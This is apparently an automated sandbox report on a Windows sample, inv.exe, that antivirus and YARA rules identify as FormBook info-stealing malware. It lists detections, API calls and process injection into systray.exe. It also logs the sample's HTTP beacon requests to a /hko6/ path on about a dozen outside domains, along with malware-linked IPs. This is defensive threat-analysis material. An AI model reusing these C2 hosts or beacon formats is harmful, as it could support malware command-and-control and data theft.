Analysis Report inv.exe

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: inv.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: inv.exe	Virustotal: Detection: 42%			Perma Link
Source: inv.exe	ReversingLabs: Detection: 67%

Yara detected FormBook

Source: Yara match	File source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Source: inv.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 2.2.inv.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Spreading:

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_009929D4 FindFirstFileExW,		0_2_009929D4
Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00992D90 FindFirstFileExW,FindNextFileW,FindClose,		0_2_00992D90
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_009929D4 FindFirstFileExW,		2_2_009929D4
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00992D90 FindFirstFileExW,FindNextFileW,FindClose,		2_2_00992D90

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\inv.exe	Code function: 4x nop then pop esi		2_2_004172FA
Source: C:\Users\user\Desktop\inv.exe	Code function: 4x nop then pop ebx		2_2_00407B05
Source: C:\Users\user\Desktop\inv.exe	Code function: 4x nop then pop edi		2_2_0040E44D
Source: C:\Users\user\Desktop\inv.exe	Code function: 4x nop then pop edi		2_2_00417D80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop esi		5_2_007472FA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop ebx		5_2_00737B05
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop edi		5_2_0073E44D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop edi		5_2_00747D80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49756
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49759
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.74:80 -> 192.168.2.7:49761
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49762
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49770
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49772
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49778
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49780

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== HTTP/1.1Host: www.azery.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.fittcycleacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=/LbTQbSxfycNpyBkUl28ip4ahz0503SiTQiCvhPHWMRp7RgREL83brTbc+Xp5Y7hhpZ940oONw== HTTP/1.1Host: www.mycapecoralhomevalue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.nextgenmemorabilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKARNXpDVSdN5zM8g6w== HTTP/1.1Host: www.bitcoincandy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.nairobi-paris.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=aHVAadkazLcgpN8DfnkezNpyp51CrlFhObeUx/sqQ/l2/vvbNLM2LhcZi7UhlF8eqCKPkpMthw== HTTP/1.1Host: www.multitask-improvements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=unPaIt4Wrr/MPjhCprV+jqsEzE7JishdMJKNe650ko6TMe0TVWcSrCraL7NT+TIMSrZljLZXYg== HTTP/1.1Host: www.affiliateclubindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=8oU9gQhEu+N8eeM1Y6MoxEZjlYuMVxPKauIzdp9CFrmDAuxODTg/6eGUiPSS+vrDP6XYMoMbRg==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.chartershome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+2P6aSZa1OhuyBgZWg== HTTP/1.1Host: www.nationshiphop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=leTXDjYcUtkTOBo/XywC86s6NVsozqkX2a5kzyiD11BblheudN5U1IiLvUCvh9+vkOfDF9tr1A==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.cfmfair.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=Z5wXWFR67775H9FWfAIDVOfBSfPNRfbmpsgUF7EF+miwYEgbR5wCg8jOIALgj8zBbklAwevO+Q==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.skinnerttc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== HTTP/1.1Host: www.azery.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.fittcycleacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=/LbTQbSxfycNpyBkUl28ip4ahz0503SiTQiCvhPHWMRp7RgREL83brTbc+Xp5Y7hhpZ940oONw== HTTP/1.1Host: www.mycapecoralhomevalue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.nextgenmemorabilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 81.88.57.68 81.88.57.68
Source: Joe Sandbox View	IP Address: 34.102.136.180 34.102.136.180

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View	ASN Name: SOFTLAYERUS SOFTLAYERUS
Source: Joe Sandbox View	ASN Name: REGISTER-ASIT REGISTER-ASIT

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== HTTP/1.1Host: www.azery.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.fittcycleacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=/LbTQbSxfycNpyBkUl28ip4ahz0503SiTQiCvhPHWMRp7RgREL83brTbc+Xp5Y7hhpZ940oONw== HTTP/1.1Host: www.mycapecoralhomevalue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.nextgenmemorabilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKARNXpDVSdN5zM8g6w== HTTP/1.1Host: www.bitcoincandy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.nairobi-paris.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=aHVAadkazLcgpN8DfnkezNpyp51CrlFhObeUx/sqQ/l2/vvbNLM2LhcZi7UhlF8eqCKPkpMthw== HTTP/1.1Host: www.multitask-improvements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=unPaIt4Wrr/MPjhCprV+jqsEzE7JishdMJKNe650ko6TMe0TVWcSrCraL7NT+TIMSrZljLZXYg== HTTP/1.1Host: www.affiliateclubindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=8oU9gQhEu+N8eeM1Y6MoxEZjlYuMVxPKauIzdp9CFrmDAuxODTg/6eGUiPSS+vrDP6XYMoMbRg==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.chartershome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+2P6aSZa1OhuyBgZWg== HTTP/1.1Host: www.nationshiphop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=leTXDjYcUtkTOBo/XywC86s6NVsozqkX2a5kzyiD11BblheudN5U1IiLvUCvh9+vkOfDF9tr1A==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.cfmfair.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=Z5wXWFR67775H9FWfAIDVOfBSfPNRfbmpsgUF7EF+miwYEgbR5wCg8jOIALgj8zBbklAwevO+Q==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.skinnerttc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== HTTP/1.1Host: www.azery.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.fittcycleacademy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=/LbTQbSxfycNpyBkUl28ip4ahz0503SiTQiCvhPHWMRp7RgREL83brTbc+Xp5Y7hhpZ940oONw== HTTP/1.1Host: www.mycapecoralhomevalue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 HTTP/1.1Host: www.nextgenmemorabilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: g.msn.com

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Nov 2020 07:25:10 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 6b 6f 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hko6/ was not found on this server.</p></body></html>

Urls found in memory or binary data

Source: systray.exe, 00000005.00000002.1317017162.00000000051FF000.00000004.00000001.sdmp	String found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.260102956.0000000006840000.00000004.00000001.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Users\user\Desktop\inv.exe	Code function: 0_2_00971120 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetConsoleWindow,ShowWindow,LoadLibraryA,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW,		0_2_00971120
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0041A060 NtClose,		2_2_0041A060
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0041A110 NtAllocateVirtualMemory,		2_2_0041A110
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00419F30 NtCreateFile,		2_2_00419F30
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00419FE0 NtReadFile,		2_2_00419FE0
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_0041A08A NtAllocateVirtualMemory,		2_2_0041A08A
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00419FDA NtReadFile,		2_2_00419FDA
Source: C:\Users\user\Desktop\inv.exe	Code function: 2_2_00419FDC NtReadFile,		2_2_00419FDC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048495D0 NtClose,LdrInitializeThunk,		5_2_048495D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849540 NtReadFile,LdrInitializeThunk,		5_2_04849540
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048496D0 NtCreateKey,LdrInitializeThunk,		5_2_048496D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048496E0 NtFreeVirtualMemory,LdrInitializeThunk,		5_2_048496E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849650 NtQueryValueKey,LdrInitializeThunk,		5_2_04849650
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849660 NtAllocateVirtualMemory,LdrInitializeThunk,		5_2_04849660
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849780 NtMapViewOfSection,LdrInitializeThunk,		5_2_04849780
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849FE0 NtCreateMutant,LdrInitializeThunk,		5_2_04849FE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849710 NtQueryInformationToken,LdrInitializeThunk,		5_2_04849710
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849840 NtDelayExecution,LdrInitializeThunk,		5_2_04849840
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849860 NtQuerySystemInformation,LdrInitializeThunk,		5_2_04849860
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048499A0 NtCreateSection,LdrInitializeThunk,		5_2_048499A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849910 NtAdjustPrivilegesToken,LdrInitializeThunk,		5_2_04849910
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849A50 NtCreateFile,LdrInitializeThunk,		5_2_04849A50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048495F0 NtQueryInformationFile,		5_2_048495F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849520 NtWaitForSingleObject,		5_2_04849520
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0484AD30 NtSetContextThread,		5_2_0484AD30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849560 NtWriteFile,		5_2_04849560
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849610 NtEnumerateValueKey,		5_2_04849610
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849670 NtQueryInformationProcess,		5_2_04849670
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_048497A0 NtUnmapViewOfSection,		5_2_048497A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_0484A710 NtOpenProcessToken,		5_2_0484A710
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849730 NtQueryVirtualMemory,		5_2_04849730
Source: C:\Windows\SysWOW64\systray.exe	Code function: 5_2_04849760 NtOpenProcess,		5_2_04849760
